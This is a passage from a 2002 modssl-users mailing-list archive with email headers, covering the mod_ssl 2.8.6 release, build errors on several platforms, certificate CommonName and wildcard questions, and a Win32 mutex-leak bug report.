------_=_NextPart_001_01C1AAA5.7375A4A0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 06:36:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id GAA03508; Fri, 1 Feb 2002 06:35:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ajax.cnchost.com id GAA03463; Fri, 1 Feb 2002 06:34:23 +0100 (MET) Received: from LAP012 (adsl-66-125-225-235.dsl.sntc01.pacbell.net [66.125.225.235]) by ajax.cnchost.com id AAA12599; Fri, 1 Feb 2002 00:34:10 -0500 (EST) [ConcentricHost SMTP Relay 1.14] From: "Gilles gros" To: Subject: RE: ??? 1.3.23 Date: Thu, 31 Jan 2002 21:34:12 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <20020128202142.GA30295@engelschall.com> Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Gilles gros" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users When is planned the final release ? Thanks for letting us know. Gilles -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On Behalf Of Ralf S. Engelschall Sent: Monday, January 28, 2002 12:22 PM To: modssl-users@modssl.org Subject: Re: ??? 1.3.23 On Mon, Jan 28, 2002, Ralf S. Engelschall wrote: > > [...] > > And, the mod_ssl I get from CVS is for 1.3.20, which is *less* than the > > one that is downloadable already built for 1.3.22, shooting holes in my > > initial theory that going to the CVS was even getting me closer to now... > > Ops, my fault. The rsync cronjob was broken which updated the CVS copy > from my master machine. Now fixed. > > For Apache 1.3.23: Expect an mod_ssl update for 1.3.23 within the next > days. The mod_ssl CVS not got Apache 1.3.23 imporated and the patch set was updated. I'm still incorporating other bugfixes before 2.8.6 will be released the next days. In the meantime you already can find the latest CVS state as mod_ssl-SNAP-20020128.tar.gz (or any newer) on the FTP server. Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 07:06:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA06332; Fri, 1 Feb 2002 07:05:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta6.snfc21.pbi.net id HAA06321; Fri, 1 Feb 2002 07:04:47 +0100 (MET) Received: from christopher.tokpela.com ([63.200.61.35]) by mta6.snfc21.pbi.net (iPlanet Messaging Server 5.1 (built May 7 2001)) with ESMTP id <0GQU000YSBJWP2@mta6.snfc21.pbi.net> for modssl-users@modssl.org; Thu, 31 Jan 2002 22:04:45 -0800 (PST) Date: Thu, 31 Jan 2002 22:02:31 -0800 From: Christopher Taranto Subject: Re[2]: How a module can tell if a server is enabled to use SSL? In-reply-to: <61F0C65933ACD311ABCC00A0C9F1AD74C4F171@conntmx01.con.secur ecomputing.com> X-Sender: efaqs.com/christopher@opal.he.net To: modssl-users@modssl.org Message-id: <4.3.2.7.2.20020131163411.04fb0690@opal.he.net> MIME-version: 1.0 X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Content-type: text/plain; charset=us-ascii; format=flowed Content-transfer-encoding: 7BIT Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Christopher Taranto X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, Use the -l directive on the command-line to show the compliled in modules. Look for mod_ssl.c. ./httpd -l Compiled-in modules: http_core.c mod_env.c mod_log_config.c mod_mime.c mod_negotiation.c mod_status.c mod_include.c mod_autoindex.c mod_dir.c mod_cgi.c mod_asis.c mod_imap.c mod_actions.c mod_userdir.c mod_alias.c mod_rewrite.c mod_access.c mod_auth.c mod_proxy.c mod_setenvif.c mod_ssl.c At 02:20 PM 1/31/02 -0800, you wrote: >Does anyone know how my module (written in C), can tell if a server is >enabled to use SSL? >There doesn't seem to be a direct way of doing it. >Thanks for the help. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 10:01:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA13882; Fri, 1 Feb 2002 10:00:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ip9.elmar.co.il id JAA13781; Fri, 1 Feb 2002 09:59:14 +0100 (MET) Received: from netmask.it (ip9.elmar.co.il [192.168.1.9]) by ip9.elmar.co.il (8.11.6/8.11.6) with ESMTP id g11AwxX24351 for ; Fri, 1 Feb 2002 12:58:59 +0200 Message-ID: <3C5A74F3.B1330626@netmask.it> Date: Fri, 01 Feb 2002 12:58:59 +0200 From: Eli Marmor Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: How a module can tell if a server is enabled to use SSL? References: <61F0C65933ACD311ABCC00A0C9F1AD74C4F171@conntmx01.con.securecomputing.com> Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eli Marmor X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Look at the source of mod_info.c. An easier but uglier way would be to call ap_exists_config_define to check if "SSL" is defined. -- Eli Marmor marmor@netmask.it CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: +972-9-766-1020 8 Yad-Harutzim St. Fax.: +972-9-766-1314 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 12:19:23 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA21064; Fri, 1 Feb 2002 12:18:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA21025; Fri, 1 Feb 2002 12:17:41 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 446B84CE746; Fri, 1 Feb 2002 12:17:39 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g11B9FX86626; Fri, 1 Feb 2002 12:09:15 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from saturn.home.ben.com id IAA08647; Fri, 1 Feb 2002 08:02:41 +0100 (MET) Received: from pulsar.home.ben.com (pulsar.home.ben.com [172.17.42.9]) by saturn.home.ben.com (8.11.6/8.11.6) with ESMTP id g1172dK61571 for ; Thu, 31 Jan 2002 23:02:39 -0800 (PST) Received: from pulsar.home.ben.com (bjj@localhost) by pulsar.home.ben.com (8.11.6/8.6.12) with ESMTP id g1172cp25728 for ; Thu, 31 Jan 2002 23:02:38 -0800 (PST) Message-Id: <200202010702.g1172cp25728@pulsar.home.ben.com> To: modssl-users@modssl.org Subject: A *new* fix for the MSIE/mod_ssl problem Date: Thu, 31 Jan 2002 23:02:38 -0800 From: Ben Jackson Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ben Jackson X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users When I used `make certificate TYPE=custom' I was following a HOWTO which included a comment about making CommonName exactly equal to the FQDN of the server. I accidentally did that on the step where I was generating the CA. When I got to my certificate I realized my mistake and set it there as well. The result was that all of the fields of both certificates matched. The result worked fine on Mozilla and Voyager (3com Audrey) and with `openssl s_client' but not on MSIE, where it got the dreaded "Cannot find server or DNS error". I had every other workaround in place with no joy (cache, nokeepalive, the unclean shutdown, degrade to http/1.0, tested them all with `openssl s_client'). When I generated a new certificate being careful to differ a few major fields (most importantly CommonName, I think) and stop/startssl'd Apache it worked (not `restart' and `graceful' did not pick up my new cert). The debug output of openssl is slightly different as well (the verify return messages). And now, lo and behold, it works on MSIE. And I still have a bit of hair left! --Ben ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 12:19:27 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA21070; Fri, 1 Feb 2002 12:18:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA21017; Fri, 1 Feb 2002 12:17:39 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id DB4784CE694; Fri, 1 Feb 2002 12:17:38 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g11B8n886590; Fri, 1 Feb 2002 12:08:49 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from atlrel8.hp.com id AAA14442; Fri, 1 Feb 2002 00:02:28 +0100 (MET) Received: from xatlrelay2.atl.hp.com (xatlrelay2.atl.hp.com [15.45.89.191]) by atlrel8.hp.com (Postfix) with ESMTP id B191CA007C0 for ; Thu, 31 Jan 2002 18:02:16 -0500 (EST) Received: from xatlbh1.atl.hp.com (xatlbh1.atl.hp.com [15.45.89.186]) by xatlrelay2.atl.hp.com (Postfix) with ESMTP id 6DDEA400092 for ; Thu, 31 Jan 2002 18:02:16 -0500 (EST) Received: by xatlbh1.atl.hp.com with Internet Mail Service (5.5.2653.19) id ; Thu, 31 Jan 2002 18:02:16 -0500 Message-ID: From: "WONG,ED (HP-Boise,ex1)" To: "'modssl-users@modssl.org'" Subject: modssl/apache2 compile problems Date: Thu, 31 Jan 2002 18:02:12 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "WONG,ED (HP-Boise,ex1)" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hey All, I'm encountering the following problems while compiling apache 2.0.28 w/modssl enabled: ssl_scache_shmht.c ssl_util.c ssl_util_ssl.c ssl_util_table.c Generating Code... link.exe @C:\DOCUME~1\edwon\LOCALS~1\Temp\nmb02172. Creating library .\Debug\mod_ssl.lib and object .\Debug\mod_ssl.exp ssl_expr.obj : error LNK2001: unresolved external symbol _ssl_expr_yyparse ssl_expr_scan.obj : error LNK2001: unresolved external symbol _ssl_expr_yylval .\Debug\mod_ssl.so : fatal error LNK1120: 2 unresolved externals NMAKE : fatal error U1077: 'link.exe' : return code '0x460' Stop. NMAKE : fatal error U1077: '"C:\Program Files\Microsoft Visual Studio\VC98\BIN\NMAKE.exe"' : return code '0x2' Stop. Error executing NMAKE. Apache.exe - 5 error(s), 3 warning(s) To recap, here's what I have done so far: awk and perl installed and placed in path bison and sed installed and placed in path (even their env variables set properly) downloaded and compiled openssl 0.9.6c downloaded apache 2.0.28 placed (and renamed) openssl into /apachedir/srclib/openssl placed openssl's .lib files in locations where they are found by the visual studio 6.0 compiler open the apache.dsw file set active project to installbin tried to build and got the above error. Everything seemed to be going fine until it gets to compiling modSSL. What is this "ssl_expr.obj : error LNK2001: unresolved external symbol _ssl_expr_yyparse ssl_expr_scan.obj : error LNK2001: unresolved external symbol _ssl_expr_yylval" all about? I've even tried to get mod_ssl to work by DSO, but it keeps telling me that it can't find c:\apachedir\modules\mod_ssl.so, eventhough the file IS exactly where it claims to not be able to find it. Could I have missed something with this DSO method of loading mod_ssl? ************************************** Edward Wong Connectivity Software Engineer Hewlett-Packard Company ************************************** ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 13:14:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA24396; Fri, 1 Feb 2002 13:13:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail3.bigmailbox.com id NAA24392; Fri, 1 Feb 2002 13:12:59 +0100 (MET) Received: (from www@localhost) by mail3.bigmailbox.com (8.10.0/8.10.0) id g11CCog13983; Fri, 1 Feb 2002 04:12:50 -0800 Date: Fri, 1 Feb 2002 04:12:50 -0800 Message-Id: <200202011212.g11CCog13983@mail3.bigmailbox.com> Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary X-Mailer: MIME-tools 4.104 (Entity 4.116) Mime-Version: 1.0 X-Originating-Ip: [209.53.22.149] From: "OSX Developer" To: modssl-users@modssl.org Subject: apache-1.3.20 + OpenSSL-0.9.6c + ModSSL-2.8.4-1.3.20 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "OSX Developer" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Well I am using OSX Server 10.1.2 I found a patch for OpenSSL-0.9.6c so it compiles and passes the 'make test' tests (before rc4test failed). Then I do the ModSSL thing to apache-1.3.20. First I get an error saying '-undefined error' (instead of '-undefined support' in the make file) must be used when -twolevel_namespace is in effect After the change to '-undefined error' that problem goes away. Then it says can't locate file for -ldbm I looked (via locate and find) for a libdbm.a and there is no such thing. What do I do know? suffer? How can I build a libdbm.a for OSX Server 10.1.2 if that's what it needs? (I made a few tweaks to apache myself ... those sould not matter, but are needed.) I found in /usr/libexec/httpd/libssl.so and tried putting it into modules/ssl. It did compile to some degree! Yet I never see the module in the module list displayed via the 'httpd -l' module list command. Nor can I seem to add mod_rewrite.o!?! I changed both Configuration and Configuration.apaci but not luck. I noticed mod_ssl puts SharedModule libssl.so and it has to make a mod_ssl.so, but I would think it should only work with an... AddModule mod_ssl.o I tried renaming mod_ssl.so to mod_ssl.o, nothing works though. I really need a libdbm.a I suppose (Apple?) or a patch the size of a small tent. ------------------------------------------------------------ WWW.COM - Where the Web Begins! http://www.www.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 13:26:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA24978; Fri, 1 Feb 2002 13:25:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.billdesk.com id NAA24939; Fri, 1 Feb 2002 13:24:23 +0100 (MET) Received: from shakeel ([203.199.79.3]) by mail.billdesk.com (8.11.6/8.11.6) with SMTP id g11CTTY10544 for ; Fri, 1 Feb 2002 17:59:30 +0530 Message-ID: <010201c1ab1d$678d4f80$4600000a@billdesk.com> From: "Shakeel Shaikh" To: Subject: To unSubscribe Date: Fri, 1 Feb 2002 18:08:44 +0530 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00FF_01C1AB4B.7CD1B6A0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Shakeel Shaikh" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_00FF_01C1AB4B.7CD1B6A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dear sir, I want to unsubscribe for your mailing list please unlist me from your mailing list. Shakeel Shaikh IndiaIdeas.com Pvt.Ltd. E 510 Crystal Plaza Andheri Link Road Andheri (w),Mumbai 400 053 INDIA Tel: 692 0005 *************************************************************************= *************************************************************** The information contained in this communication is intended solely for = theuse of the individual or entity to whom it is addressed and others authorised to receive it. It may contain confidential or legally = privileged information. If you are not the intended recipient you are = hereby=20 notified that any disclosure, copying, distribution or taking any action = in reliance on the contents of this information is strictly prohibited = and may be unlawful. If you have received this communication in error, = please notify us immediately by responding to this email and then delete it from your system. IndiaIdeas is neither liable for the proper and = complete transmission of the information contained in this communication nor for any delay in its receipt. ------=_NextPart_000_00FF_01C1AB4B.7CD1B6A0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Dear sir,
 
I want to unsubscribe for = your mailing=20 list please unlist
me from your mailing list.
 
 
Shakeel Shaikh
IndiaIdeas.com = Pvt.Ltd.
E 510=20 Crystal Plaza
Andheri Link Road
Andheri (w),Mumbai 400=20 053
INDIA
Tel: 692 0005
 
*********************************************************= *************************************************************************= ******
The=20 information contained in this communication is intended solely for = theuse of the=20 individual or entity to whom it is addressed and others
authorised to = receive=20 it. It may contain confidential or legally privileged information. If = you are=20 not the intended recipient you are hereby
notified that any = disclosure,=20 copying, distribution or taking any action in reliance on the contents = of this=20 information is strictly prohibited and
may be unlawful. If you have = received=20 this communication in error, please notify us immediately by responding = to this=20 email and then delete
it from your system. IndiaIdeas is neither = liable for=20 the proper and complete transmission of the information contained in = this=20 communication
nor for any delay in its = receipt.
------=_NextPart_000_00FF_01C1AB4B.7CD1B6A0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 14:13:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA27479; Fri, 1 Feb 2002 14:12:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id OAA27438; Fri, 1 Feb 2002 14:11:50 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1000) id A90224CE53D; Fri, 1 Feb 2002 14:11:49 +0100 (CET) Date: Fri, 1 Feb 2002 14:11:49 +0100 From: "Ralf S. Engelschall" To: modssl-users@modssl.org Subject: Re: ??? 1.3.23 Message-ID: <20020201141149.A32301@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.23i Organization: Engelschall, Germany. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users In article you wrote: > When is planned the final release ? For today. Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 14:33:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA28171; Fri, 1 Feb 2002 14:32:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id OAA28139; Fri, 1 Feb 2002 14:31:11 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 849C84CE53D; Fri, 1 Feb 2002 14:31:10 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g11CYdK89359; Fri, 1 Feb 2002 13:34:39 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from lugabout.jhcloos.org id MAA22383; Fri, 1 Feb 2002 12:47:43 +0100 (MET) Received: by lugabout.jhcloos.org (Postfix on SuSE Linux 7.3 (i386), from userid 500) id F38D11020E; Fri, 1 Feb 2002 11:47:26 +0000 (GMT) Date: Fri, 1 Feb 2002 06:47:26 -0500 From: James Cloos To: modssl-users@modssl.org Subject: Re: Wildcard certificates Message-ID: <20020201064726.A12344@lugabout.jhcloos.org> References: <200201290056.g0T0uGKu029642@daedalus.andrew.net.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200201290056.g0T0uGKu029642@daedalus.andrew.net.au> User-Agent: Mutt/1.3.22.1i Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: James Cloos X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, Jan 29, 2002 at 10:56:16AM +1000, Andrew Pollock wrote: > I'm trying to roll my own wildcard certificate (i.e. where the CN = > *.domain.com) > I'm assuming there's more to it than just putting an asterisk in the CN field? While CN="*.domain.com" is the typical thing to do, I've found that netscape and mozilla (though I've not tried it with the latest versions) had no problem accepting a cert where CN='domain.com' for any machine foo.domain.com. I never had an opportunity to try it myself w/ ie or opera, but I never got any complaints from users of them either. Whether the behavior I saw is best considered a bug or a feature, I'll leave to debate. -JimC ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 15:30:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA00832; Fri, 1 Feb 2002 15:29:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from visp.engelschall.com id PAA00791; Fri, 1 Feb 2002 15:28:36 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 8B8A34CE73D; Fri, 1 Feb 2002 15:28:35 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) id g11ESCQ98471; Fri, 1 Feb 2002 15:28:12 +0100 (CET) Date: Fri, 1 Feb 2002 15:28:12 +0100 From: "Ralf S. Engelschall" To: modssl-announce@modssl.org, modssl-users@modssl.org Subject: [ANNOUNCE] mod_ssl 2.8.6 (for Apache 1.3.23) Message-ID: <20020201142812.GA98449@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.24i Organization: Engelschall, Germany. X-Web-Homepage: http://www.engelschall.com/ X-PGP-Public-Key: https://www.engelschall.com/ho/rse/pgprse.asc X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users mod_ssl 2.8.6 for Apache 1.3.23 is now available. The corresponding CHANGES entries are appended. You can fetch it from: o http://www.modssl.org/source/ o ftp://ftp.modssl.org/source/ Yours, Ralf S. Engelschall rse@engelschall.com www.engelschall.com Changes with mod_ssl 2.8.6 (16-Oct-2001 to 01-Feb-2002) *) Upgraded to Apache 1.3.23 *) Fixed a subtle indexing bug in SHMCB. Each sub-cache used an indexing structure that (correctly) used index values (and ranges) as "unsigned int", but the meta-structure in the header had these ranged as "unsigned char". *) Perform the SHMCB remove operation under mutual exclusion to prevent a inter-process synchronization problem. *) Made sure that mod_ssl does not segfault in case of SCOREBOARD_SIZE < 1024. *) Merged in the SDBM patch from Uwe Ohse which fixes a problem with sdbms .dir file, which arrises when a second .dir block is needed for the first time. read() returns 0 in that case, and the library forgot to initialize that new block. A related problem is that the calculation of db->maxbno is wrong. It just appends 4096*BYTESIZ bits, which is not enough except for small databases (.dir basically doubles everytime it's too small). ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 15:38:26 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA01137; Fri, 1 Feb 2002 15:37:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA01125; Fri, 1 Feb 2002 15:36:58 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 417E24CE715; Fri, 1 Feb 2002 15:36:57 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g11EY9n99023; Fri, 1 Feb 2002 15:34:09 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id PAA00814; Fri, 1 Feb 2002 15:29:07 +0100 (MET) Date: Fri, 1 Feb 2002 15:29:07 +0100 (MET) Message-Id: <200202011429.PAA00814@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] Resource on win2000 (PR#657) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wed, Jan 09, 2002, modssl-bugdb@modssl.org wrote: > Full_Name: Zheng XiangYang > Version: 2.8.5 > OS: win2000 > Submission from: (NULL) (211.155.22.200) > > the mutex handles "lock_cs[i]" "in ssl_util_thread_setup" are not closed when > the module is unloaded. Each time the child dies, more handles are opened (can > see from task manager) Ok, but can anybody of the Win32 folks give me the prototype of the DestroyMutex (or whatever it is called) function we had to call? I've no Win32 development environment available to figure this out myself... Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 15:38:33 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA01140; Fri, 1 Feb 2002 15:37:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA01124; Fri, 1 Feb 2002 15:36:58 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 28D794CE53D; Fri, 1 Feb 2002 15:36:57 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g11EY3R99011; Fri, 1 Feb 2002 15:34:03 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from oceanic.wsisiz.edu.pl id PAA29346; Fri, 1 Feb 2002 15:00:35 +0100 (MET) Received: from localhost (localhost [127.0.0.1]) by oceanic.wsisiz.edu.pl (Postfix) with ESMTP id 34BCE98432 for ; Fri, 1 Feb 2002 15:00:33 +0100 (CET) Received: from oceanic.wsisiz.edu.pl (oceanic.wsisiz.edu.pl [213.135.44.33]) by oceanic.wsisiz.edu.pl (Postfix) with ESMTP id 72C059842B for ; Fri, 1 Feb 2002 15:00:32 +0100 (CET) Date: Fri, 1 Feb 2002 15:00:32 +0100 (CET) From: "Tomasz 'DIGGER' Jankowski" To: modssl-users@modssl.org Subject: compile problems Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-2 Content-Transfer-Encoding: 8BIT X-Virus-Scanned: by AMaViS perl-11 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Tomasz 'DIGGER' Jankowski" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users i'm not expirienced with compiling stuff with linux, rather used rpms but i need to compile apache 1.3.22 with mod_ssl and I do it as follows: [root@elmax mod_ssl-2.8.5-1.3.22]# ./configure --with-apache=../apache_1.3.22 [root@elmax apache_1.3.22]# SSL_BASE=/usr/bin/openssl ./configure --enable-module=most --enable-module=ssl --enable-shared=max --prefix=/usr/local/apache everything goes ok, without any warnings or errors. until... [root@elmax apache_1.3.22]# make ===> src make[1]: Wchodzê katalog `/root/apache/apache_1.3.22' make[2]: Wchodzê katalog `/root/apache/apache_1.3.22/src' make[2]: *** Brak regu³ do wykonania obiektu `all'. Stop. make[2]: Opuszczam katalog `/root/apache/apache_1.3.22/src' make[1]: *** [build-std] B³±d 2 make[1]: Opuszczam katalog `/root/apache/apache_1.3.22' make: *** [build] B³±d 2 make is localized to polish but error is: No rules to execute object 'all'. Stop. ***build-std Error 2 Anyway without mod_ssl patches and changes apache compilation goes ok. the make mechanism is not known for me so please help me in this trouble :-). greetings, Tomasz Jankowski ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 15:44:29 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA01660; Fri, 1 Feb 2002 15:43:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from black.qint.de id PAA01636; Fri, 1 Feb 2002 15:42:55 +0100 (MET) Received: from qint.de (salt.w2k.qint.de [195.30.176.86]) by black.qint.de (8.11.6/8.11.4) with ESMTP id g11EgnI06531; Fri, 1 Feb 2002 14:42:49 GMT Message-ID: <3C5AA969.46A38CF8@qint.de> Date: Fri, 01 Feb 2002 15:42:49 +0100 From: Patrick Mayweg X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en,de MIME-Version: 1.0 To: modssl-users@modssl.org CC: 